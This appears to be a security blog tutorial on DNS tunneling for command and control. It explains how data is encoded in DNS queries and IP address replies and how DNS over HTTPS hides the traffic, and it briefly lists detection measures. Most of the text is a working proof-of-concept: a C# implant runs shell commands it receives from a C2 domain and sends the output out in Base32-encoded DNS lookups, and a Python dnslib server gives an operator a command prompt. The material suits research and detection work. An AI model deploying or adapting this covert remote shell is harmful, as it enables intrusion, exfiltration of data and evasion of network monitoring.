The Domain Name System (DNS) is used to resolve hostnames to their associated IP addresses. DNS can also be used as a transport mechanism for malware Command & Control (C2) messages. This is useful in environments where a restrictive web proxy makes outbound HTTP connections difficult.
The concept of DNS tunneling is simple. An attacker configures a nameserver (NS) record that delegates a subdomain to their C2 server. For instance, they could configure an NS record for c2.malware.com so that queries for any name beneath it, such as subdomain.c2.malware.com, are sent to that server.
In a corporate environment, a client typically sends DNS requests to an internal DNS server. If that server cannot answer a query itself, it resolves the name by querying other servers, starting from the root servers. The DNS client therefore never connects directly to the attacker’s server; its queries reach it through the normal resolution chain.
Data from the client to the C2 server can be encoded within the hostname of an A record query. For example, a client could request test1.c2.malware.com, which the server can parse to determine that the client’s ID is test1. The server can reply by encoding data in the IP address it returns. For instance, using ASCII encoding, the server could return the letters “wait” by responding with the IP address 119.97.105.116 (w = 119, a = 97, i = 105, t = 116).
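The ASCII-to-octet scheme described above can be sketched in a few lines of Python. This is a minimal illustration rather than the exact code used later in this post: the function names are hypothetical, it assumes plain ASCII input of at most four characters per address, and it pads unused octets with 32 (a space), as the server code does.

```python
def encode_ascii_to_ipv4(text: str) -> str:
    """Pack up to four ASCII characters into a dotted-quad IPv4 address.

    Each character becomes one octet holding its ASCII code; unused
    octets are padded with 32 (an ASCII space).
    """
    if len(text) > 4:
        raise ValueError("an IPv4 address can carry at most 4 characters")
    codes = [ord(ch) for ch in text]
    if any(code > 127 for code in codes):
        raise ValueError("only ASCII characters are supported")
    codes += [32] * (4 - len(codes))
    return ".".join(str(code) for code in codes)


def decode_ipv4_to_ascii(address: str) -> str:
    """Turn each octet of a dotted-quad address back into a character."""
    return "".join(chr(int(octet)) for octet in address.split("."))


print(encode_ascii_to_ipv4("wait"))            # 119.97.105.116
print(decode_ipv4_to_ascii("119.97.105.116"))  # wait
print(repr(decode_ipv4_to_ascii(encode_ascii_to_ipv4("ls"))))  # 'ls  '
```

Because short chunks are padded with spaces, the receiver should trim the reassembled string, which is what the C# client does with Trim() before running a command.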
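To upload larger amounts of data from the client to the server, the data can be Base32 encoded. Base32 is suitable because its alphabet (the letters A to Z and the digits 2 to 7) contains only characters permitted in hostnames, and because it uses a single letter case it can be decoded case-insensitively, matching the case-insensitivity of DNS names. Base64, by contrast, depends on letter case and uses '+' and '/'. Base32’s '=' padding character is not valid in a hostname, so data is best split into chunks whose length is a multiple of 5 bytes, which encode without padding.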
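The chunking and encoding described above can be sketched with Python’s standard base64 module. This is a hedged sketch: the client ID ABCDE and the zone c2.example.com are hypothetical placeholders, and the 30-byte chunk size and '^' filler follow the C# client in this post. Thirty bytes is a multiple of 5, so each chunk encodes to exactly 48 Base32 characters with no '=' padding, and the 5-character ID plus 48 characters gives a 53-character label, inside the 63-character limit DNS places on a single label.

```python
import base64

LABEL_LIMIT = 63  # maximum length of a single DNS label
CHUNK_BYTES = 30  # multiple of 5, so Base32 output needs no '=' padding
PAD_BYTE = b"^"   # filler for the final short chunk, as in the C# client


def data_to_names(data: bytes, client_id: str, zone: str) -> list[str]:
    """Split data into 30-byte chunks and build one query name per chunk.

    Each name has the form <client_id><base32(chunk)>.<zone>.
    """
    names = []
    for start in range(0, len(data), CHUNK_BYTES):
        chunk = data[start:start + CHUNK_BYTES].ljust(CHUNK_BYTES, PAD_BYTE)
        label = client_id + base64.b32encode(chunk).decode("ascii")
        if len(label) > LABEL_LIMIT:
            raise ValueError("label exceeds the 63-character DNS limit")
        names.append(f"{label}.{zone}")
    return names


def names_to_data(names: list[str], id_length: int = 5) -> bytes:
    """Receiver side: drop the client ID, decode each label, strip the filler."""
    decoded = b"".join(
        base64.b32decode(name.split(".")[0][id_length:], casefold=True)
        for name in names
    )
    return decoded.rstrip(PAD_BYTE)


message = b"The quick brown fox jumps over the lazy dog"
names = data_to_names(message, "ABCDE", "c2.example.com")
for name in names:
    print(name)
print(names_to_data(names))  # b'The quick brown fox jumps over the lazy dog'
```

Decoding with casefold=True lets the receiver accept labels whose letter case was changed in transit, which some resolvers do. As in the C# client, any genuine trailing '^' characters in the data would be lost; a length prefix would avoid that.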
DNS tunneling is not restricted to A records. Other record types, such as AAAA (16 bytes per address rather than 4) or TXT (free-form text strings of up to 255 bytes each), can also be used; they offer more space per response for encoded messages and therefore higher throughput.
Each request the client sends must use a unique name. Otherwise, intermediary DNS servers may answer from their cache and the query never reaches the C2 server.
DNS Record Configuration
The following DNS records were configured using GoDaddy’s DNS manager.
Type | Name | Value | TTL (seconds)
A | NS1 | 1.1.1.1 | 900
NS | C2 | ns1.mydomain.com | 900
Any DNS query for a name under c2.mydomain.com, such as subdomain.c2.mydomain.com, is delegated to ns1.mydomain.com, which resolves to the IP address of our C2 server (1.1.1.1 is used as a placeholder here).
DNS Over HTTPS (DoH)
DoH is a way of performing DNS lookups over an HTTPS connection.
Cloudflare provides documentation on how to perform these requests. From an attacker’s perspective, using DoH has a couple of benefits:
- Traffic is encrypted by default. Unless HTTPS inspection is performed, network analytics systems cannot see the names being queried.
- The client network only sees connections to the DoH provider’s servers, masking the real destination of the traffic.
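A JSON-format DoH lookup is a plain HTTPS GET request, which the sketch below illustrates with Python’s standard library. It assumes Cloudflare’s JSON API at https://cloudflare-dns.com/dns-query (the C# client in this post points at https://1.1.1.1/dns-query instead), the application/dns-json accept header, and a response whose Answer entries carry type and data fields; the function names are hypothetical. The parsing step can be tried offline against a sample response.

```python
import json
import urllib.parse
import urllib.request

DOH_ENDPOINT = "https://cloudflare-dns.com/dns-query"  # Cloudflare's public DoH endpoint
A_RECORD_TYPE = 1  # numeric DNS type code for A records


def build_doh_request(name: str, record_type: str = "A") -> urllib.request.Request:
    """Build a DoH JSON API request for the given name and record type."""
    query = urllib.parse.urlencode({"name": name, "type": record_type})
    return urllib.request.Request(
        f"{DOH_ENDPOINT}?{query}",
        headers={"accept": "application/dns-json"},
    )


def extract_a_records(body: str) -> list[str]:
    """Return the IPv4 addresses from the Answer section of a JSON DoH response.

    Answers of other types (for example a CNAME earlier in the chain) are skipped.
    """
    response = json.loads(body)
    return [
        answer["data"]
        for answer in response.get("Answer", [])
        if answer.get("type") == A_RECORD_TYPE
    ]


def doh_lookup(name: str, timeout: float = 10.0) -> list[str]:
    """Perform the lookup over HTTPS (requires network access)."""
    with urllib.request.urlopen(build_doh_request(name), timeout=timeout) as resp:
        return extract_a_records(resp.read().decode("utf-8"))


# Offline example with a made-up response shaped like the JSON API's output
sample = '{"Status": 0, "Answer": [{"name": "example.com", "type": 1, "TTL": 60, "data": "192.0.2.1"}]}'
print(extract_a_records(sample))  # ['192.0.2.1']
```

Filtering on type 1 is a deliberate choice: the C# client in this post keeps the data field of the last answer regardless of type, which would return a hostname rather than an address if the answer chain ended in a CNAME.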
DNS Tunneling Detection
There are a number of things defenders can do to counter DNS tunneling:
- Sinkhole known malicious DNS domains.
- Perform DNS frequency analysis. Most SIEM systems provide use cases that trigger on large increases in DNS requests from a single host.
- Most DNS C2 clients rely on Base32 or similar encoding schemes. This results in lookups for long subdomains containing many digits. This is unusual behavior and can also be alerted on.
- Block direct outbound DNS connections at the firewall. DNS traffic should only be allowed to leave the organisation from internal DNS servers. Note that this does not block DoH, which is carried over HTTPS.
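The frequency and name-shape checks above can be prototyped against exported DNS logs before being turned into SIEM rules. The sketch below is illustrative only: the thresholds are assumptions rather than tuned values, the input is assumed to be (source IP, query name) pairs from a single time window, and the parent domain is approximated by the last two labels, which is wrong for suffixes such as co.uk.

```python
import math
from collections import Counter, defaultdict

# Illustrative thresholds (assumptions, not tuned values)
MAX_LABEL_LEN = 40
MIN_DIGIT_RATIO = 0.2
MIN_ENTROPY = 3.5
MAX_UNIQUE_NAMES = 100


def shannon_entropy(text: str) -> float:
    """Average bits of information per character in text."""
    counts = Counter(text)
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def name_findings(qname: str) -> list[str]:
    """Return reasons why the leftmost label of qname looks like encoded data."""
    label = qname.rstrip(".").split(".")[0]
    findings = []
    if len(label) > MAX_LABEL_LEN:
        findings.append("long label")
    if len(label) >= 10 and sum(ch.isdigit() for ch in label) / len(label) >= MIN_DIGIT_RATIO:
        findings.append("digit-heavy label")
    if len(label) >= 16 and shannon_entropy(label) >= MIN_ENTROPY:
        findings.append("high entropy")
    return findings


def noisy_hosts(queries, parent_levels: int = 2) -> dict:
    """Count distinct names each host queried under each parent domain.

    queries: iterable of (source_ip, qname) pairs from one time window.
    Returns only the (source_ip, parent) pairs above MAX_UNIQUE_NAMES.
    """
    seen = defaultdict(set)
    for source, qname in queries:
        labels = qname.rstrip(".").lower().split(".")
        parent = ".".join(labels[-parent_levels:])
        seen[(source, parent)].add(".".join(labels))
    return {key: len(names) for key, names in seen.items() if len(names) > MAX_UNIQUE_NAMES}


print(name_findings("www.example.com"))           # []
print(name_findings("a1b2c3d4e5f6.example.com"))  # ['digit-heavy label']
```

Legitimate services that encode data in DNS names can also trip these checks, so an allowlist of known domains is usually needed before alerting.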
Creating a Proof of Concept Client
Below is a .NET 6 C# client for macOS. The client uses A records to carry data and performs lookups using either standard DNS or DoH. It depends on the DnsClient and Newtonsoft.Json NuGet packages.
A Python DNS server, built on the dnslib library, is also provided. The server does not support DoH directly; however, when the client uses DoH, the DoH service (Cloudflare in this case) performs the lookup and relays it to the server as a standard DNS request.
C# Client Code
```csharp
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Net;
using System.Net.Http;
using System.Net.Http.Headers;
using System.Text;
using DnsClient;
using Newtonsoft.Json;
using Newtonsoft.Json.Linq;

public static class c2client
{
    // Config variables
    static String C2Server = ".test.bordergate.co.uk";
    // Client poll time in milliseconds
    static int C2delay = 2000;
    // Placeholder ClientID (randomly generated in GetCommands)
    static String ClientID = "XXXXX";
    // Use Cloudflare DNS over HTTPS
    static int UseDOH = 1;

    private static Random random = new Random();

    public static string RandomString(int length)
    {
        const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
        return new string(Enumerable.Repeat(chars, length)
            .Select(s => s[random.Next(s.Length)]).ToArray());
    }

    public static string DecodeCommand(string address) // Convert IP address returned by server to ASCII
    {
        String result = "error";
        try
        {
            string[] octets = address.Split('.');
            result = "";
            foreach (var octet in octets)
            {
                int unicode = Convert.ToInt32(octet);
                char character = (char)unicode;
                result += character.ToString();
            }
        }
        catch
        {
            Console.WriteLine("Error splitting string: " + address);
        }
        return result;
    }

    public static string DOHLookup(string domain) // Performs lookup using Cloudflare DoH
    {
        String ipv4 = "";
        try
        {
            string apiEndpoint = "https://1.1.1.1/dns-query?name=";
            using (var client = new HttpClient())
            {
                client.DefaultRequestHeaders
                    .Accept
                    .Add(new MediaTypeWithQualityHeaderValue("application/dns-json"));
                var response = client.GetAsync(apiEndpoint + domain).GetAwaiter().GetResult();
                if (response.IsSuccessStatusCode)
                {
                    string results = response.Content.ReadAsStringAsync().GetAwaiter().GetResult();
                    Console.WriteLine(results);
                    dynamic dynObj = JsonConvert.DeserializeObject(results);
                    foreach (var answer in dynObj.Answer)
                    {
                        ipv4 = answer.data;
                    }
                }
            }
        }
        catch
        {
            Console.WriteLine("DOH lookup failed");
        }
        return ipv4;
    }

    public static string IPLookup(String domain) // Resolve a domain to an IP address
    {
        string ip = "";
        if (UseDOH == 1)
        {
            ip = DOHLookup(domain);
        }
        else
        {
            var client = new LookupClient(new LookupClientOptions(NameServer.GooglePublicDns)
            {
                UseCache = false,
                EnableAuditTrail = false,
                Retries = 10,
                Timeout = TimeSpan.FromSeconds(20),
                ThrowDnsErrors = false
            });
            foreach (var aRecord in client.Query(domain, QueryType.A).Answers.ARecords())
            {
                ip = aRecord.Address.ToString();
            }
        }
        return ip;
    }

    public static void GetCommands() // Make a DNS request with a 5-character client ID and a 5-character random value (to prevent caching issues)
    {
        // Assign the static field (not a local) so UploadResults uses the same ID
        ClientID = RandomString(5);
        String CommandBuffer = "";
        while (true)
        {
            String request = ClientID + RandomString(5) + C2Server;
            String address = IPLookup(request);
            if (address == "")
            {
                Console.WriteLine("DNS Lookup failed: " + request);
                Console.WriteLine("Sleeping 10 seconds...");
                System.Threading.Thread.Sleep(10000);
            }
            else
            {
                String command = DecodeCommand(address);
                Console.WriteLine(DateTime.Now.ToString("THH:mm:ss") + " Server:" + command);
                if (command == "wait")
                {
                    // do nothing
                }
                else if (command == "::::")
                {
                    // "::::" signifies the buffered command should be executed
                    Console.WriteLine(DateTime.Now.ToString("THH:mm:ss") + " Running command: '" + CommandBuffer + "'");
                    UploadResults(ExecCommand(CommandBuffer.Trim()));
                    CommandBuffer = "";
                }
                else
                {
                    CommandBuffer += command;
                }
            }
            System.Threading.Thread.Sleep(C2delay);
        }
    }

    public static string ExecCommand(String command) // Execute a command
    {
        try
        {
            Process p = new Process();
            p.StartInfo.UseShellExecute = false;
            p.StartInfo.RedirectStandardOutput = true;
            p.StartInfo.FileName = "bash";
            p.StartInfo.Arguments = " -c \"" + command + "\"";
            p.Start();
            string output = p.StandardOutput.ReadToEnd();
            p.WaitForExit();
            Console.Write(output);
            return output;
        }
        catch
        {
            Console.WriteLine("Error running command");
            return "Error running command: '" + command + "'";
        }
    }

    public static string UploadResults(String results) // Send results back to the server in 30-byte chunks, one A record lookup per chunk
    {
        IEnumerable<string> chunks = results.Split(30);
        foreach (string chunk in chunks)
        {
            if (chunk.Length != 30)
            {
                Console.WriteLine("Padding small chunk: " + chunk.Length);
                String paddedchunk = chunk.PadRight(30, '^');
                String Base32Encoded = DNSC2.Base32Encoding.ToString(Encoding.ASCII.GetBytes(paddedchunk));
                Console.WriteLine(Base32Encoded);
                IPLookup(ClientID + Base32Encoded + C2Server);
            }
            else
            {
                String Base32Encoded = DNSC2.Base32Encoding.ToString(Encoding.ASCII.GetBytes(chunk));
                Console.WriteLine(Base32Encoded);
                IPLookup(ClientID + Base32Encoded + C2Server);
            }
        }
        return "";
    }

    public static void Main()
    {
        GetCommands();
    }
}

public static class Extensions
{
    // Split a string into chunks of at most n characters
    public static IEnumerable<string> Split(this string str, int n)
    {
        if (String.IsNullOrEmpty(str) || n < 1)
        {
            yield break;
        }
        for (int i = 0; i < str.Length; i += n)
        {
            yield return str.Substring(i, Math.Min(n, str.Length - i));
        }
    }
}
```
Client Base32 Encoding Library
```csharp
using System;

namespace DNSC2
{
    public static class Base32Encoding
    {
        public static byte[] ToBytes(string input)
        {
            if (string.IsNullOrEmpty(input))
            {
                throw new ArgumentNullException("input");
            }

            input = input.TrimEnd('='); // remove padding characters
            int byteCount = input.Length * 5 / 8; // this must be TRUNCATED
            byte[] returnArray = new byte[byteCount];

            byte curByte = 0, bitsRemaining = 8;
            int mask = 0, arrayIndex = 0;

            foreach (char c in input)
            {
                int cValue = CharToValue(c);

                if (bitsRemaining > 5)
                {
                    mask = cValue << (bitsRemaining - 5);
                    curByte = (byte)(curByte | mask);
                    bitsRemaining -= 5;
                }
                else
                {
                    mask = cValue >> (5 - bitsRemaining);
                    curByte = (byte)(curByte | mask);
                    returnArray[arrayIndex++] = curByte;
                    curByte = (byte)(cValue << (3 + bitsRemaining));
                    bitsRemaining += 3;
                }
            }

            // if we didn't end with a full byte
            if (arrayIndex != byteCount)
            {
                returnArray[arrayIndex] = curByte;
            }

            return returnArray;
        }

        public static string ToString(byte[] input)
        {
            if (input == null || input.Length == 0)
            {
                throw new ArgumentNullException("input");
            }

            int charCount = (int)Math.Ceiling(input.Length / 5d) * 8;
            char[] returnArray = new char[charCount];

            byte nextChar = 0, bitsRemaining = 5;
            int arrayIndex = 0;

            foreach (byte b in input)
            {
                nextChar = (byte)(nextChar | (b >> (8 - bitsRemaining)));
                returnArray[arrayIndex++] = ValueToChar(nextChar);

                if (bitsRemaining < 4)
                {
                    nextChar = (byte)((b >> (3 - bitsRemaining)) & 31);
                    returnArray[arrayIndex++] = ValueToChar(nextChar);
                    bitsRemaining += 5;
                }

                bitsRemaining -= 3;
                nextChar = (byte)((b << bitsRemaining) & 31);
            }

            // if we didn't end with a full char
            if (arrayIndex != charCount)
            {
                returnArray[arrayIndex++] = ValueToChar(nextChar);
                while (arrayIndex != charCount) returnArray[arrayIndex++] = '='; // padding
            }

            return new string(returnArray);
        }

        private static int CharToValue(char c)
        {
            int value = (int)c;

            // 65-90 == uppercase letters
            if (value < 91 && value > 64)
            {
                return value - 65;
            }
            // 50-55 == numbers 2-7
            if (value < 56 && value > 49)
            {
                return value - 24;
            }
            // 97-122 == lowercase letters
            if (value < 123 && value > 96)
            {
                return value - 97;
            }

            throw new ArgumentException("Character is not a Base32 character.", "c");
        }

        private static char ValueToChar(byte b)
        {
            if (b < 26)
            {
                return (char)(b + 65);
            }

            if (b < 32)
            {
                return (char)(b + 24);
            }

            throw new ArgumentException("Byte is not a valid Base32 value.", "b");
        }
    }
}
```
Python Server Code
```python
#!/usr/bin/env python
import argparse
import base64
import datetime
import sys
import time
import threading
import traceback
import socketserver
import struct
from dnslib import *
import logging

clientdict = {}
commandlist = []
clientid = ''
activeclient = ""


class DomainName(str):
    def __getattr__(self, item):
        return DomainName(item + '.' + self)


D = DomainName('')
IP = '1.1.1.1'
TTL = 1 * 5

soa_record = SOA(
    mname=D.ns1,   # primary name server
    rname=D.test,  # email of the domain administrator
    times=(
        201307231,     # serial number
        60 * 60 * 1,   # refresh
        60 * 60 * 3,   # retry
        60 * 60 * 24,  # expire
        60 * 60 * 1,   # minimum
    )
)
ns_records = [NS(D.ns1), NS(D.ns2)]
records = {}


def encodecommand(raw_command):
    # Take part of a command (up to 4 characters) and encode it in an IP address.
    # Unused octets are 32 (an ASCII space), which the client trims.
    responsearray = ['32', '32', '32', '32']
    i = 0
    for letter in raw_command:
        responsearray[i] = ord(letter)
        i += 1
    result = ""
    for octet in responsearray:
        result += str(octet) + "."
    return result[:-1]


def c2logic(qn):
    # Check the domain requested. Supply commands back to the client.
    global commandlist
    global clientid
    global clientdict
    global activeclient
    requestarray = qn.split(".")
    clientid = requestarray[0]
    clientid = clientid[:5]
    if clientid not in clientdict:
        print("new connection from: " + clientid)
        dt = datetime.datetime.now()
        clientdict[clientid] = str(dt)
    if (len(clientid) == 5) and (clientid == activeclient):
        if len(commandlist) != 0:
            logging.info("SERVER RESPONSE")
            logging.info(commandlist)
            logging.info(commandlist[0])
            response = commandlist[0]
            del commandlist[0]
        else:
            response = encodecommand("wait")
    else:
        logging.info("WAITING")
        response = encodecommand("wait")
    return response


def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    qtype = request.q.qtype
    qt = QTYPE[qtype]
    D = qn
    logging.info("CLIENT REQUEST: " + qn)
    command = qn.split('.')[0]

    if len(command) == 10:
        # A 10-character label (5-char client ID + 5-char nonce) is a beacon requesting a command
        IP = c2logic(qn)
        if IP == '58.58.58.58':
            commandlist.clear()
    else:
        # Otherwise it's a chunk of command output: client ID followed by Base32 data
        logging.info("CLIENT RESPONSE " + command)
        command = command[5:]
        logging.info("COMMAND " + command)
        decoded = base64.b32decode(bytearray(command, 'ascii')).decode('utf-8')
        logging.info(decoded)
        # Strip the '^' padding added by the client and print chunks back to back
        print(str(decoded).replace('^', ''), end='', flush=True)
        IP = "9.9.9.9"

    records = {D: [A(IP), AAAA((0,) * 16), soa_record]}
    for name, rrs in records.items():
        if name == qn:
            for rdata in rrs:
                rqt = rdata.__class__.__name__
                if qt in ['*', rqt]:
                    reply.add_answer(RR(rname=qname, rtype=getattr(QTYPE, rqt), rclass=1, ttl=TTL, rdata=rdata))
            for rdata in ns_records:
                reply.add_ar(RR(rname=D, rtype=QTYPE.NS, rclass=1, ttl=TTL, rdata=rdata))
            reply.add_auth(RR(rname=D, rtype=QTYPE.SOA, rclass=1, ttl=TTL, rdata=soa_record))
    return reply.pack()


class BaseRequestHandler(socketserver.BaseRequestHandler):

    def get_data(self):
        raise NotImplementedError

    def send_data(self, data):
        raise NotImplementedError

    def handle(self):
        try:
            data = self.get_data()
            self.send_data(dns_response(data))
        except Exception:
            pass


class TCPRequestHandler(BaseRequestHandler):

    def get_data(self):
        # Binary DNS data must not be strip()ped: valid bytes can look like whitespace
        data = self.request.recv(8192)
        sz = struct.unpack('>H', data[:2])[0]
        if sz < len(data) - 2:
            raise Exception("Wrong size of TCP packet")
        elif sz > len(data) - 2:
            raise Exception("Too big TCP packet")
        return data[2:]

    def send_data(self, data):
        sz = struct.pack('>H', len(data))
        return self.request.sendall(sz + data)


class UDPRequestHandler(BaseRequestHandler):

    def get_data(self):
        return self.request[0]

    def send_data(self, data):
        return self.request[1].sendto(data, self.client_address)


def main():
    global activeclient
    parser = argparse.ArgumentParser(description='Start a DNS implemented in Python. Usually DNSs use UDP on port 53.')
    parser.add_argument('--port', default=53, type=int, help='The port to listen on.')
    parser.add_argument('--tcp', action='store_true', help='Listen to TCP connections.')
    parser.add_argument('--udp', action='store_true', help='Listen to UDP datagrams.')
    parser.add_argument('-d', action='store_true', help='Debug mode')
    args = parser.parse_args()
    print("Starting nameserver...")
    args.udp = True  # UDP is always enabled

    servers = []
    if args.udp:
        servers.append(socketserver.ThreadingUDPServer(('', args.port), UDPRequestHandler))
    if args.tcp:
        servers.append(socketserver.ThreadingTCPServer(('', args.port), TCPRequestHandler))
    if args.d:
        logging.basicConfig(level=logging.INFO, format='%(asctime)s :: %(levelname)s :: %(message)s')

    for s in servers:
        thread = threading.Thread(target=s.serve_forever)
        thread.daemon = True
        thread.start()
        print("%s server loop running in thread: %s" % (s.RequestHandlerClass.__name__[:3], thread.name))

    try:
        while 1:
            # Take user input. Divide into 4-character chunks and encode. End with '::::'.
            usercommand = input("\n" + clientid + ">")
            if usercommand == "clients":
                print(clientdict)
            elif usercommand.startswith("active"):
                activeclient = usercommand.split(" ")[1]
                print("active client: " + activeclient)
            else:
                csize = 4
                chunks = [usercommand[i:i + csize] for i in range(0, len(usercommand), csize)]
                for chunk in chunks:
                    commandlist.append(encodecommand(chunk))
                commandlist.append('58.58.58.58')  # "::::" tells the client to execute
            sys.stderr.flush()
            sys.stdout.flush()
    except KeyboardInterrupt:
        pass
    finally:
        for s in servers:
            s.shutdown()


if __name__ == '__main__':
    main()
```